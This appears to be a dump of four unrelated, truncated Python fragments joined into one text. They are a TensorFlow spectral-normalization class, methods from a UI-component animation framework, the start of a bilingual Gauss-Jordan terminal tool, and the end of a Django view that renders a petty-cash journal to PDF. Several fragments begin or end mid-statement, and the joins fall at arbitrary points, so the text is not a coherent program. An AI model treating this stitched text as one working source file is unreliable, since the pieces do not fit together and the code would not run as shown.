if row_index.dtype != col_index.dtype:
raise AttributeError('dtype of row-index and col-index do not match.')
if row_index.dtype == tf.int32:
return tf.gather(tf.gather(mat, row_index, axis=0), col_index, axis=1)
elif row_index.dtype == tf.bool:
return tf.boolean_mask(tf.boolean_mask(mat, row_index, axis=0), col_index, axis=1)
else:
raise AttributeError('Type of index is: {}; expected either tf.int32 or tf.bool'.format(row_index.dtype))
########################################################################
def l2normalization(w):
""" This function applies l2 normalization to the input vector.
If w is a matrix / tensor, the Frobenius norm is used for normalization.
:param w:
:return:
"""
# tf.norm is slightly faster than tf.sqrt(tf.reduce_sum(tf.square()))
# it is important that axis=None; in this case, norm(w) = norm(vec(w))
return w / (tf.norm(w, ord='euclidean', axis=None) + FLAGS.EPSI)
class SpectralNorm(object):
def __init__(self, sn_def, name_scope='SN', scope_prefix='', num_iter=1):
""" This class contains functions to calculate the spectral normalization of the weight matrix
using power iteration.
The application of spectral normal to NN is proposed in following papers:
<NAME>., & <NAME>. (2017).
Spectral Norm Regularization for Improving the Generalizability of Deep Learning.
<NAME>., <NAME>., <NAME>., & <NAME>. (2017).
Spectral Normalization for Generative Adversarial Networks,
Here spectral normalization is generalized for any linear ops or combination of linear ops
Example of usage:
Example 1.
w = tf.constant(np.random.randn(3, 3, 128, 64).astype(np.float32))
sn_def = {'op': 'tc', 'input_shape': [10, 64, 64, 64],
'output_shape': [10, 128, 64, 64],
'strides': 1, 'dilation': 1, 'padding': 'SAME',
'data_format': 'NCHW'}
sigma = SpectralNorm(sn_def, name_scope='SN1', num_iter=20).apply(w)
Example 2.
w = tf.constant(np.random.randn(3, 3, 128, 64).astype(np.float32))
w2 = tf.constant(np.random.randn(3, 3, 128, 64).astype(np.float32))
sn_def = {'op': 'tc', 'input_shape': [10, 64, 64, 64],
'output_shape': [10, 128, 64, 64],
'strides': 1, 'dilation': 1, 'padding': 'SAME',
'data_format': 'NCHW'}
SN = SpectralNorm(sn_def, num_iter=20)
sigma1 = SN.apply(w)
sigma2 = SN.apply(w2, name_scope='SN2', num_iter=30)
:param sn_def: a dictionary with keys depending on the type of kernel:
type keys value options
dense: 'op' 'd' - common dense layer; 'cd' - conditional dense layers;
'dcd' - dense + conditional dense; 'dck' - dense * conditional scale
'project' - same to cd, except num_out is 1
conv: 'op' 'c' - convolution; 'tc' - transpose convolution;
'cck' - convolution * conditional scale; 'tcck' - t-conv * conditional scale
'strides' integer
'dilation' integer
'padding' 'SAME' or 'VALID'
'data_format' 'NCHW' or 'NHWC'
'input_shape' list of integers in format NCHW or NHWC
'output_shape' for 'tc', output shape must be provided
:param name_scope:
:param scope_prefix:
:param num_iter: number of power iterations per run
"""
self.sn_def = sn_def.copy()
self.name_scope = name_scope
self.scope_prefix = scope_prefix
self.name_in_err = self.scope_prefix + self.name_scope
self.num_iter = num_iter
# initialize
self.w = None
self.x = None
self.use_u = None
self.is_initialized = False
self.forward = None
self.backward = None
# format stride
if self.sn_def['op'] in {'c', 'tc', 'cck', 'tcck'}:
if self.sn_def['data_format'] in ['NCHW', 'channels_first']:
self.sn_def['strides'] = (1, 1, self.sn_def['strides'], self.sn_def['strides'])
else:
self.sn_def['strides'] = (1, self.sn_def['strides'], self.sn_def['strides'], 1)
assert 'output_shape' in self.sn_def, \
'{}: for conv, output_shape must be provided.'.format(self.name_in_err)
def _init_routine(self):
""" This function decides the routine to minimize memory usage
:return:
"""
if self.is_initialized is False:
# decide the routine
if self.sn_def['op'] in {'d', 'project'}:
# for d kernel_shape [num_in, num_out]; for project, kernel shape [num_class, num_in]
assert len(self.kernel_shape) == 2, \
'{}: kernel shape {} does not have length 2'.format(self.name_in_err, self.kernel_shape)
num_in, num_out = self.kernel_shape
# self.use_u = True
self.use_u = True if num_in <= num_out else False
x_shape = [1, num_in] if self.use_u else [1, num_out]
self.forward = self._dense_ if self.use_u else self._dense_t_
self.backward = self._dense_t_ if self.use_u else self._dense_
elif self.sn_def['op'] in {'cd'}: # kernel_shape [num_class, num_in, num_out]
assert len(self.kernel_shape) == 3, \
'{}: kernel shape {} does not have length 3'.format(self.name_in_err, self.kernel_shape)
num_class, num_in, num_out = self.kernel_shape
self.use_u = True if num_in <= num_out else False
x_shape = [num_class, 1, num_in] if self.use_u else [num_class, 1, num_out]
self.forward = self._dense_ if self.use_u else self._dense_t_
self.backward = self._dense_t_ if self.use_u else self._dense_
elif self.sn_def['op'] in {'dck'}: # convolution * conditional scale
assert isinstance(self.kernel_shape, (list, tuple)) and len(self.kernel_shape) == 2, \
'{}: kernel shape must be a list of length 2. Got {}'.format(self.name_in_err, self.kernel_shape)
assert len(self.kernel_shape[0]) == 2 and len(self.kernel_shape[1]) == 2, \
'{}: kernel shape {} does not have length 2'.format(self.name_in_err, self.kernel_shape)
num_in, num_out = self.kernel_shape[0]
num_class = self.kernel_shape[1][0]
self.use_u = True if num_in <= num_out else False
x_shape = [num_class, num_in] if self.use_u else [num_class, num_out]
self.forward = (lambda x: self._scalar_(self._dense_(x, index=0), index=1, offset=1.0)) \
if self.use_u else (lambda y: self._dense_t_(self._scalar_(y, index=1, offset=1.0), index=0))
self.backward = (lambda y: self._dense_t_(self._scalar_(y, index=1, offset=1.0), index=0)) \
if self.use_u else (lambda x: self._scalar_(self._dense_(x, index=0), index=1, offset=1.0))
elif self.sn_def['op'] in {'c', 'tc'}:
assert len(self.kernel_shape) == 4, \
'{}: kernel shape {} does not have length 4'.format(self.name_in_err, self.kernel_shape)
# self.use_u = True
self.use_u = True \
if np.prod(self.sn_def['input_shape'][1:]) <= np.prod(self.sn_def['output_shape'][1:]) \
else False
if self.sn_def['op'] in {'c'}: # input / output shape NCHW or NHWC
x_shape = self.sn_def['input_shape'].copy() if self.use_u else self.sn_def['output_shape'].copy()
x_shape[0] = 1
y_shape = self.sn_def['input_shape'].copy()
y_shape[0] = 1
elif self.sn_def['op'] in {'tc'}: # tc
x_shape = self.sn_def['output_shape'].copy() if self.use_u else self.sn_def['input_shape'].copy()
x_shape[0] = 1
y_shape = self.sn_def['output_shape'].copy()
y_shape[0] = 1
else:
raise NotImplementedError('{}: {} not implemented.'.format(self.name_in_err, self.sn_def['op']))
self.forward = self._conv_ if self.use_u else (lambda y: self._conv_t_(y, x_shape=y_shape))
self.backward = (lambda y: self._conv_t_(y, x_shape=y_shape)) if self.use_u else self._conv_
elif self.sn_def['op'] in {'cck', 'tcck'}: # convolution * conditional scale
assert isinstance(self.kernel_shape, (list, tuple)) and len(self.kernel_shape) == 2, \
'{}: kernel shape must be a list of length 2. Got {}'.format(self.name_in_err, self.kernel_shape)
assert len(self.kernel_shape[0]) == 4 and len(self.kernel_shape[1]) == 4, \
'{}: kernel shape {} does not have length 4'.format(self.name_in_err, self.kernel_shape)
self.use_u = True \
if np.prod(self.sn_def['input_shape'][1:]) <= np.prod(self.sn_def['output_shape'][1:]) \
else False
num_class = self.kernel_shape[1][0]
if self.sn_def['op'] in {'cck'}: # input / output shape NCHW or NHWC
x_shape = self.sn_def['input_shape'].copy() if self.use_u else self.sn_def['output_shape'].copy()
x_shape[0] = num_class
y_shape = self.sn_def['input_shape'].copy()
y_shape[0] = num_class
self.forward = (lambda x: self._scalar_(self._conv_(x, index=0), index=1, offset=1.0)) \
if self.use_u \
else (lambda y: self._conv_t_(self._scalar_(y, index=1, offset=1.0), x_shape=y_shape, index=0))
self.backward = (lambda y: self._conv_t_(
self._scalar_(y, index=1, offset=1.0), x_shape=y_shape, index=0)) \
if self.use_u else (lambda x: self._scalar_(self._conv_(x, index=0), index=1, offset=1.0))
elif self.sn_def['op'] in {'tcck'}: # tcck
x_shape = self.sn_def['output_shape'].copy() if self.use_u else self.sn_def['input_shape'].copy()
x_shape[0] = num_class
y_shape = self.sn_def['output_shape'].copy()
y_shape[0] = num_class
self.forward = (lambda x: self._conv_(self._scalar_(x, index=1, offset=1.0), index=0)) \
if self.use_u \
else (lambda y: self._scalar_(self._conv_t_(y, x_shape=y_shape, index=0), index=1, offset=1.0))
self.backward = (lambda y: self._scalar_(
self._conv_t_(y, x_shape=y_shape, index=0), index=1, offset=1.0)) \
if self.use_u else (lambda x: self._conv_(self._scalar_(x, index=1, offset=1.0), index=0))
else:
raise NotImplementedError('{}: {} not implemented.'.format(self.name_in_err, self.sn_def['op']))
else:
raise NotImplementedError('{}: {} is not implemented.'.format(self.name_in_err, self.sn_def['op']))
self.x = tf.get_variable(
'in_rand', shape=x_shape, dtype=tf.float32,
initializer=tf.truncated_normal_initializer(), trainable=False)
self.is_initialized = True
def _scalar_(self, x, index=None, offset=0.0):
""" This function defines a elementwise multiplication op: y = x * w, where | |
str, str, str]):
"""sets a margin
Args:
margin (Tuple[str, str, str, str]): margin string.
Can be in pixels or percentages
"""
self.imargin = [UIMetric.parse(margin[0]),
UIMetric.parse(margin[1]),
UIMetric.parse(margin[2]),
UIMetric.parse(margin[3])]
@property
def padding(self) -> Tuple[int, int, int, int]:
"""Padding of component in pixels
Returns:
Tuple[int, int, int, int]: pixel padding (left, right, top, bottom)
"""
return (self.ipadding[0].to_pixels(self.width),
self.ipadding[1].to_pixels(self.width),
self.ipadding[2].to_pixels(self.height),
self.ipadding[3].to_pixels(self.height))
@padding.setter
def padding(self, padding: Tuple[str, str, str, str]):
"""sets a padding
Args:
padding (Tuple[str, str, str, str]): padding str.
Can be in pixels or percentages
"""
self.ipadding = [UIMetric.parse(padding[0]),
UIMetric.parse(padding[1]),
UIMetric.parse(padding[2]),
UIMetric.parse(padding[3])]
self._reset("padding")
def add_child(self, child: UIComponent):
"""Add a child component to this component.
NOTE: Order matters, depending on the layout
set in UIComponent.props.layout.
Also triggers a component reset, if the component is dynamically sized.
Args:
child (UIComponent): a child UIComponent
"""
child.parent = self
child.set_chronometer(self._chronometer)
self.children.append(child)
if self.props.resize_mode == ResizeMode.AUTO:
self._reset('add_child')
def has_child(self, child_name: str) -> bool:
for child in self.children:
if child_name == child.name:
return True
return False
def get_child(self, child_name: str) -> Optional[UIComponent]:
for child in self.children:
if child_name == child.name:
return child
return None
def remove_child(self, child_name: str) -> bool:
"""remove a child from this component.
Args:
child_name (str): name of child component.
Returns:
bool: whether or not the child existed in the first place to be removed
"""
for idx, child in enumerate(self.children):
if child.name == child_name:
self.children.pop(idx)
return True
return False
def add_surf(self, surf: Surface, pos: Tuple[int, int]):
"""Add a hard-coded surface to this component.
Args:
surf (Surface): A Surface
pos (Tuple[int, int]): the coordinate position of the top left of surface
"""
self.manual_surfaces.append((pos, surf))
def speed_up_animation(self, multiplier: int):
"""scales the animation of the component and its children
Args:
multiplier (int): the animation speed to be set
"""
self.animation_speed = multiplier
for child in self.children:
child.speed_up_animation(multiplier)
def is_animating(self) -> bool:
"""
Returns:
bool: Is this component currently in the middle of an animation
"""
return len(self.queued_animations) != 0
def any_children_animating(self) -> bool:
"""Returns whether or not any children are currently in the middle of an animation.
Useful for deciding whether or not to shut this component down.
Returns:
bool: Are any children recursively animating?
"""
for child in self.children:
if child.any_children_animating():
return True
if len(child.queued_animations) > 0:
return True
return False
@animated('!enter')
def enter(self):
"""the component enters, i.e. allows it to display.
Because of the @animated tag, will automatically queue
the animation named "!enter" if it exists in the UIObject's
saved animations
"""
for child in self.children:
child.enter()
self.enabled = True
@animated('!exit')
def exit(self, is_top_level=True) -> bool:
"""Makes the component exit, i.e. transitions it out
Because of the @animated tag, will automatically queue
the animation named "!exit" if it exists in the UIObject's
saved animations
This will also recursively exit any children.
Args:
is_top_level (bool): Whether or not this is the top level parent.
If not, then this will not actually disable. This is because if
you disable a top-level component, then you will never render its children
anyway; this will avoid graphical bugs such as children vanishing instantly
before the parent animates out.
Returns:
bool: whether or not this is disabled, or is waiting on children to finish animating.
"""
for child in self.children:
child.exit(False)
if not is_top_level:
return
if self.any_children_animating() or self.is_animating():
# there's an animation playing; wait until afterwards to exit it
self.queue_animation([toggle_anim(False)], force=True)
else:
self.enabled = False
def enable(self):
"""does the same thing as enter(), except forgoes all animations
"""
self.enabled = True
for child in self.children:
child.enable()
def disable(self, is_top_level=True):
"""Does the same as exit(), except forgoes all animations.
"""
self.enabled = False
def queue_animation(self, animations: List[UIAnimation] = [], names: List[str] = [], force: bool = False):
"""Queues a series of animations for the component. This method can be called with
arbitrary animations to play, or it can be called with names corresponding to
an animation saved in its animation dict, or both, with names taking precedence.
The animations will automatically trigger in the order in which they were queued.
NOTE: by default, this does not allow queueing when an animation is already playing.
Args:
animation (List[UIAnimation], optional): A list of animations to queue. Defaults to [].
name (List[str], optional): The names of saved animations. Defaults to [].
force (bool, optional): Whether or not to queue this animation even if other animations are already playing.
Defaults to False.
"""
if not force and self.is_animating():
return
for name in names:
if name in self.saved_animations:
n_animation = self.saved_animations[name]
for anim in n_animation:
anim.component = self
self.queued_animations.append(anim)
for animation in animations:
animation.component = self
self.queued_animations.append(animation)
def push_animation(self, animations: List[UIAnimation] = [], names: List[str] = []):
"""Pushes an animation onto the animation stack, effectively pausing
the current animation and starting another one. N.B. this will not call
the "begin_anim" function of the first animation upon it resuming, so using this may result in
graphical "glitches". Don't use this unless you know exactly why you're using it.
Args:
animation (UIAnimation): The UIAnimation to push and begin *right now*.
"""
for name in names[::-1]:
if name in self.saved_animations:
n_animation = self.saved_animations[name]
for anim in n_animation[::-1]:
self.queued_animations.insert(0, anim)
for animation in animations[::-1]:
animation.component = self
self.queued_animations.insert(0, animation)
def save_animation(self, animation: UIAnimation, name: str):
"""Adds an animation to the UIComponent's animation dict.
This is useful for adding animations that may be called many times.
Args:
animation (UIAnimation): [description]
name (str): [description]
"""
if name in self.saved_animations:
self.saved_animations[name].append(animation)
else:
self.saved_animations[name] = [animation]
def skip_next_animation(self):
"""Finishes the next animation immediately
"""
current_num_animations = len(self.queued_animations)
while len(self.queued_animations) >= current_num_animations and len(self.queued_animations) > 0:
self.update(100)
def skip_all_animations(self):
"""clears the animation queue by finishing all of them instantly, except for unskippable animations
Useful for skip button implementation.
"""
for child in self.children:
child.skip_all_animations()
# remove unskippable animations from queue
unskippables = [anim for anim in self.queued_animations if not anim.skippable]
self.queued_animations = list(filter(lambda anim: anim.skippable, self.queued_animations))
while len(self.queued_animations) > 0:
self.update(100)
self.queued_animations = unskippables
def update(self, manual_delta_time=0):
"""update. used at the moment to advance animations.
"""
if manual_delta_time > 0:
delta_time = manual_delta_time
else:
delta_time = (self._chronometer() - self._last_update) * self.animation_speed
self._last_update = self._chronometer()
if len(self.queued_animations) > 0:
try:
if self.queued_animations[0].update(delta_time):
# the above function call returns True if the animation is finished
self.queued_animations.pop(0)
except Exception as e:
logging.exception('%s: Animation exception! Aborting animation for component %s. Error message: %s',
'ui_framework.py:update()',
self.name,
repr(e))
self.queued_animations.pop(0)
def _reset(self, reason: str=None):
"""Resets internal state. Triggers on dimension change, so as to allow
dynamically resized subclasses to resize on prop change.
Args:
reason (str): the source of the reset call; usually the name of the function or property
(e.g. 'size')
"""
pass
def _create_bg_surf(self) -> Surface:
"""Generates the background surf for this component of identical dimension
as the component itself. If the background image isn't the same size as the component,
and we want to rescale, then we will use PIL to rescale. Because rescaling is expensive,
we'll be making use of limited caching here.
Returns:
Surface: A surface of size self.width x self.height, containing a scaled background image.
"""
if self.props.bg is None:
surf = engine.create_surface(self.tsize, True)
surf.fill(self.props.bg_color)
return surf
else:
if not self.cached_background or not self.cached_background.get_size() == self.tsize:
if self.props.bg_resize_mode == ResizeMode.AUTO:
bg_raw = engine.surf_to_raw(self.props.bg, 'RGBA')
pil_bg = Image.frombytes('RGBA', self.props.bg.get_size(), bg_raw, 'raw')
pil_bg = pil_bg.resize(self.tsize, resample=LANCZOS)
bg_scaled = engine.raw_to_surf(pil_bg.tobytes('raw', 'RGBA'), self.tsize, 'RGBA')
self.cached_background = bg_scaled
else:
base = engine.create_surface(self.tsize, True)
base.blit(self.props.bg, (0, 0))
self.cached_background = base
return self.cached_background
def to_surf(self) -> Surface:
if not self.enabled:
return engine.create_surface(self.size, True)
# draw the background.
base_surf = self._create_bg_surf().copy()
# position and then draw all children recursively according to our layout
for child in self.children:
child.update()
for idx, child_pos in enumerate(self.layout_handler.generate_child_positions()):
child = self.children[idx]
base_surf.blit(child.to_surf(), child_pos)
# draw the hard coded surfaces | |
"""Gauss-Jordan assistant
Enabling user-driven live demonstration of the Gauss-Jordan algorithm
in a terminal/console.
Source: https://github.com/aroberge/gauss-jordan-assistant
Requires Python 3.8+ and Rich (https://github.com/willmcgugan/rich)
All the content is in this single file, for those that do not want
to install from Pypi and simply copy and possibly modify to suit
their individual needs.
The organisation is as follows:
1. Rich specific definitions
2. Translations (French and English)
3. String parsing using regular expressions
4. Various LaTeX templates
5. The main code
"""
__version__ = "0.3"
import re
import tkinter
from tkinter import filedialog
from fractions import Fraction
from rich.box import Box
from rich.console import Console
from rich.markdown import Markdown
from rich.table import Table
from rich.theme import Theme
# Since we already use Rich, we might as well get pretty tracebacks. :-)
from rich.traceback import install
install(extra_lines=1)
# ===============================================
# Rich specific definitions
# ===============================================
dark_background_theme = Theme(
{
"markdown.h1.border": "deep_sky_blue1",
"markdown.h1": "bold yellow",
"markdown.h2": "bold yellow underline",
"markdown.item.bullet": "spring_green4",
"markdown.code": "bold yellow",
"matrix": "deep_sky_blue1",
"matrix_element": "white",
"error": "bold red",
"prompt": "spring_green4",
"row_operation": "bold yellow",
"same_row": "bold white underline",
"echelon": "white on dark_red",
}
)
light_background_theme = Theme(
{
"markdown.h1.border": "deep_sky_blue1",
"markdown.h1": "blue",
"markdown.h2": "blue underline",
"markdown.item.bullet": "spring_green4",
"markdown.code": "purple",
"matrix": "deep_sky_blue1",
"matrix_element": "black",
"error": "red",
"prompt": "spring_green4",
"row_operation": "spring_green4",
"same_row": "blue underline",
"echelon": "black on grey85",
}
)
THEME = dark_background_theme
console = Console(theme=THEME)
theme_demo_en = """
Colours are now as follows:
"input >" [prompt]input >[/prompt]
"error" [error]error[/error]
"| 0 1 |" [matrix]| [echelon] 0 [/echelon] [matrix_element] 1 [/matrix_element] |[/matrix]
"R_1 + 2 R_2 --> R_1" [same_row]R_1[/same_row][row_operation] + 2 R_2 --> [/row_operation][same_row]R_1[/same_row]
"""
theme_demo_fr = """
Les couleurs ont été changées comme suit :
"entrée >" [prompt]entrée >[/prompt]
"erreur" [error]erreur[/error]
"| 0 1 |" [matrix]| [echelon] 0 [/echelon] [matrix_element] 1 [/matrix_element] |[/matrix]
"L_1 + 2 L_2 --> L_1" [same_row]L_1[/same_row][row_operation] + 2 L_2 --> [/row_operation][same_row]L_1[/same_row]
"""
# Design our style of "box" to be used by rich
MATRIX = Box(
"""\
╭ ╮
│ ││
│ ││
│ ││
│ ││
│ ││
│ ││
╰ ╯
"""
)
# ===============================================
# String translations
# ===============================================
LANG = "en"
translations = {"en": {}, "fr": {}}
def _(text):
"""Mimicking gettext translations with simple dict"""
if LANG in translations:
return translations[LANG][text]
else:
return translations["en"][text]
help_en = """# Available commands
- `fr` : change la langue au français
- colours/colors : toggle colours, between theme designed for dark or light backgrounds.
## Matrix operations
Below, `i, j, m, n, p` are integers and `f` is either
an integer or a fraction (`m/n`).
First, define a matrix:
- `mat m x n` : Coefficient matrix
- `mat m x n | p` : Augmented matrix with `p` extra columns.
Then, perform some elementary row operations:
- `R_i <--> R_j` : row exchange
- `R_i +/- [f] R_j --> R_i` : linear combination (do not write `f` if `f=1`)
- `f R_i --> R_i` : multiplication by a scalar
## Other commands
- `latex` : saves as a LaTeX file.
- `help` / `aide`
- `quit` / `exit`
"""
help_fr = """# Liste des commandes
- `en` : changes language to English
- couleurs : change les couleurs entre deux choix selon que l' arrière-plan est pâle ou foncé
## Opérations sur les matrices
Ci-dessous, `i, j, m, n, p` sont des entiers et `f` est soit
un entier ou soit un nombre rationnel (`m/n`).
En premier, définir votre matrice
- `mat m x n` : matrice des coefficients
- `mat m x n | p` : matrice augmentée avec `p` colonnes supplémentaires
Ensuite, faites des opérations élémentaires sur les lignes:
- `L_i <--> L_j` : échange de lignes
- `L_i +/- [f] L_j --> L_i` : combinaison linéaire (omettre `f` si `f=1`)
- `f L_i --> L_i` : multiplication par un scalaire
## Autres commandes
- `latex` : sauvegarde dans un fichier LaTeX.
- `aide` / `help`
- `quit`[ter] / `exit`
"""
translations["en"]["help"] = Markdown(help_en)
translations["fr"]["help"] = Markdown(help_fr)
translations["en"]["R_or_L"] = "R"
translations["fr"]["R_or_L"] = "L"
translations["en"]["Unknown operation"] = "Unknown operation"
translations["fr"]["Unknown operation"] = "Opération non reconnue."
translations["en"]["Add matrix line"] = "Enter a line with %d matrix elements: "
translations["fr"]["Add matrix line"] = "Entrez une ligne avec %d coefficients : "
translations["en"]["Data entry stopped."] = "Data entry stopped."
translations["fr"]["Data entry stopped."] = "Entrée des données interrompue."
translations["en"]["Wrong format"] = "The matrix element format is incorrect."
translations["fr"]["Wrong format"] = "Le format des coefficients soumis est incorrect."
translations["en"]["Wrong number"] = "Wrong number of matrix elements."
translations["fr"]["Wrong number"] = "Le nombre de coefficients soumis est incorrect."
translations["en"][
"Scalar multiplication on same line"
] = "Scalar multiplication must operate on a single line."
translations["fr"][
"Scalar multiplication on same line"
] = "La multiplication par un scalaire doit transformer la même ligne."
translations["en"]["Row does not exist"] = "Row %d does not exist."
translations["fr"]["Row does not exist"] = "La ligne %s n'existe pas."
translations["en"]["Cannot multiply by zero"] = "A row cannot be multiplied by zero."
translations["fr"][
"Cannot multiply by zero"
] = "On ne peut pas multiplier une ligne par zéro."
translations["en"]["No effect"] = "This operation causes no change."
translations["fr"]["No effect"] = "Cette opération ne change rien."
translations["en"]["Must be the same line"] = "Start and end row must be the same."
translations["fr"][
"Must be the same line"
] = "Les lignes de départ et d'arrivée doivent être identiques."
translations["en"][
"Cannot use a single line"
] = "A linear combination requires two different rows."
translations["fr"][
"Cannot use a single line"
] = "Une combinaison linéaire requiert deux lignes différentes."
translations["en"]["Nothing to save"] = "Nothing to save: no matrix defined."
translations["fr"]["Nothing to save"] = "Il n'y a aucune matrice de définie."
translations["en"]["saved file"] = "Content saved in file %s"
translations["fr"]["saved file"] = "Sauvegarde dans le fichier %s"
# ===============================================
# String parsing using regular expressions
# ===============================================
re_quit = re.compile(r"(quit|exit).*", re.IGNORECASE)
re_help = re.compile(r"(help|aide).*", re.IGNORECASE)
# matches integers or fractions as in 1 22 2/33 , etc.
re_fract = re.compile(r"(-?\d+/?\d*)") # /? means zero or 1 /
# This is the most complicated regex used;
# for this reason, I have shown the main steps.
# This matches something like R_2 + 1/2 R_3 --> R_2
# For simplicity, instead of R for row, we can use L (ligne, en français):
# either L or R will work in any context.
# Also for simplicity, R_2 is identical to R2
# Finally, we limit the row number to be a single digit.
re_row_lin_combo_2 = re.compile(
r"""^ # line begins
\s*
[LR]_?(\d) # original row; can use either L or R to denote a row
\s*
(\+|-) # plus or minus
\s*
(\d+/?\d*) # integer or fraction
\s*
[LR]_?(\d) # other row
\s*
-+> # arrow -->
\s*
[LR]_?(\d) # target line
\s*
$ # end of line
""",
re.VERBOSE,
)
# mat 3 x 4
re_mat = re.compile(r"^\s*mat\s*(\d+)\s*x\s*(\d+)\s*$", re.IGNORECASE)
# mat 3 x 4 | 1
re_aug_mat = re.compile(r"^\s*mat\s*(\d+)\s*x\s*(\d+)\s*\|\s*(\d+)\s*$", re.IGNORECASE,)
# The following matches R_2 <--> R_3 and similar operations
re_row_interchange = re.compile(r"""^\s*[LR]_?(\d)\s*<-+>\s*[LR]_?(\d)\s*$""")
# This matches something like 1/2 R_3 --> R_3
re_row_scaling = re.compile(r"^\s*(-?\d+/?\d*)\s*[LR]_?(\d)\s*-+>\s*[LR]_?(\d)\s*$")
# This matches something like R_2 - R_3 --> R_2
re_row_lin_combo_1 = re.compile(
r"^\s*[LR]_?(\d)\s*(\+|-)\s*[LR]_?(\d)\s*-+>\s*[LR]_?(\d)\s*$"
)
# ===============================================
# LaTeX templates
#
# For LaTeX output, we use the beamer document class,
# with each individual transformation intended to be shown
# on a separate frame (aka slide).
#
# We also include a LaTeX command, \GJAfrac, with
# two possible definitions, giving the possibility to
# easily change how fractions are represented.
#
# Coefficient and augmented matrices are shown with
# square brackets using the "bmatrix" environment.
# Round brackets can be used instead if one replaces
# "bmatrix" by "pmatrix".
# ===============================================
LaTeX_begin_document = """
\\documentclass{beamer}
%
% augmented matrix from http://tex.stackexchange.com/questions/2233
\\makeatletter
\\renewcommand*\\env@matrix[1][*\\c@MaxMatrixCols r]{%
\\hskip -\\arraycolsep
\\let\\@ifnextchar\\new@ifnextchar
\\array{#1}}
\\makeatother
%\\newcommand{\\GJAfrac}[2]{#1/#2}
\\newcommand{\\GJAfrac}[2]{\\frac{#1}{#2}}
\\begin{document}
"""
LaTeX_end_document = "\\end{document}"
LaTeX_begin_frame = """
\\begin{frame}{Frame %d}
\\[
\\begin{matrix}[ccc]
"""
LaTeX_end_frame = """\\end{matrix}
\\]
\\end{frame}
%===========================================
"""
LaTeX_begin_bmatrix = "\\begin{bmatrix}[%s%s]"
LaTeX_end_bmatrix = "\\end{bmatrix}\n"
LaTeX_begin_row_op_matrix = "\\begin{matrix}[r]"
LaTeX_end_row_op_matrix = "\\end{matrix}\n"
# ===============================================
RIGHT_ARROW = "-->" # used in printing row operations
class Assistant:
"""Enables user-driven live demonstration of Gauss-Jordan algorithm."""
def __init__(self):
self.prompt = self.default_prompt = "> "
self.matrix = None
print("lang =", LANG)
self.interact()
def interact(self):
"""Command interpreter"""
while True:
command = self.user_input()
if re.search(re_quit, command):
break
result = self.parse(command)
if result and self.matrix is not None:
self.console_print()
self.update_latex_content()
self.current_row_operations.clear()
self.latex_current_row_operations.clear()
def parse(self, command):
"""Parses command controlling the information displayed.
To show the latest matrix update, an operation must return True.
"""
global console, LANG, THEME
lowercase = command.lower()
if lowercase in ["colors", "colours", "couleurs"]:
if THEME == dark_background_theme:
THEME = light_background_theme
else:
THEME = dark_background_theme
console = Console(theme=THEME)
if LANG == "en":
console.print(theme_demo_en)
else:
console.print(theme_demo_fr)
elif lowercase in ["en", "fr"]:
if lowercase == LANG:
console.print(_("No effect"))
else:
LANG = lowercase
print("lang =", LANG)
elif command.lower() == "latex":
self.save_latex()
elif re.search(re_help, command):
console.print(_("help"), "\n")
elif op := re.search(re_mat, command):
return self.new_matrix(int(op.group(1)), int(op.group(2)))
elif op := re.search(re_aug_mat, command):
return self.new_matrix(int(op.group(1)), int(op.group(2)), int(op.group(3)))
elif op := re.search(re_row_interchange, command):
return self.interchange_rows(int(op.group(1)), int(op.group(2)))
elif op := re.search(re_row_scaling, command):
return self.scale_row(
Fraction(op.group(1)), int(op.group(2)), | |
\
'<td>' + r5c2 + '</td>' + \
'<td>' + r5c3 + '</td>' + \
'<td>' + r5c4 + '</td>' + \
'<td>' + r5c5 + '</td>' + \
'<td>' + r5c6 + '</td>' + \
'<td>' + r5c7 + '</td>' + \
'</tr>' + \
'<tr>' + \
'<td>6</td>' + \
'<td>' + r6c1 + '</td>' + \
'<td>' + r6c2 + '</td>' + \
'<td>' + r6c3 + '</td>' + \
'<td>' + r6c4 + '</td>' + \
'<td>' + r6c5 + '</td>' + \
'<td>' + r6c6 + '</td>' + \
'<td>' + r6c7 + '</td>' + \
'</tr>' + \
'<tr>' + \
'<td>7</td>' + \
'<td>' + r7c1 + '</td>' + \
'<td>' + r7c2 + '</td>' + \
'<td>' + r7c3 + '</td>' + \
'<td>' + r7c4 + '</td>' + \
'<td>' + r7c5 + '</td>' + \
'<td>' + r7c6 + '</td>' + \
'<td>' + r7c7 + '</td>' + \
'</tr>' + \
'<tr>' + \
'<td>8</td>' + \
'<td>' + r8c1 + '</td>' + \
'<td>' + r8c2 + '</td>' + \
'<td>' + r8c3 + '</td>' + \
'<td>' + r8c4 + '</td>' + \
'<td>' + r8c5 + '</td>' + \
'<td>' + r8c6 + '</td>' + \
'<td>' + r8c7 + '</td>' + \
'</tr>' + \
'<tr>' + \
'<td>9</td>' + \
'<td>' + r9c1 + '</td>' + \
'<td>' + r9c2 + '</td>' + \
'<td>' + r9c3 + '</td>' + \
'<td>' + r9c4 + '</td>' + \
'<td>' + r9c5 + '</td>' + \
'<td>' + r9c6 + '</td>' + \
'<td>' + r9c7 + '</td>' + \
'</tr>' + \
'<tr>' + \
'<td>10</td>' + \
'<td>' + r10c1 + '</td>' + \
'<td>' + r10c2 + '</td>' + \
'<td>' + r10c3 + '</td>' + \
'<td>' + r10c4 + '</td>' + \
'<td>' + r10c5 + '</td>' + \
'<td>' + r10c6 + '</td>' + \
'<td>' + r10c7 + '</td>' + \
'</tr>' + \
'</tbody>' + \
'</table>'
body += '<br>' + \
'</div>' + \
'</div>' + \
'</div>' + \
'<br>' + \
'<script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"' + \
'integrity="<KEY>"' + \
'crossorigin="anonymous"></script>' + \
'<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.bundle.min.js"' + \
'integrity="<KEY>"' + \
'crossorigin="anonymous"></script>' + \
'</body>' + \
'</html>'
options = {
'page-size': 'A4',
'header-center': 'Petty cash journal',
'footer-left': 'Company : ' + company_name + ' [' + establishment_number + ']',
'footer-right': '[page] sur [topage]',
'encoding': 'UTF-8',
'no-outline': None,
'custom-header': [
('Accept-Encoding', 'pdf')
]
}
# path_wkthmltopdf = 'static/reporting/static/wkhtmltopdf.exe'
# config = pdfkit.configuration(wkhtmltopdf=path_wkthmltopdf)
# output = pdfkit.from_string(body, output_path=False, configuration=config, options=options)
output = pdfkit.from_string(body, output_path=False, options=options)
response = HttpResponse(output, content_type='application/pdf')
response['Content-Disposition'] = 'attachment; filename="petty_cash_journal.pdf"'
return response
def vendor_product_pricing_sheet(request):
return render(request, 'reporting/vendor_product_pricing_sheet.html')
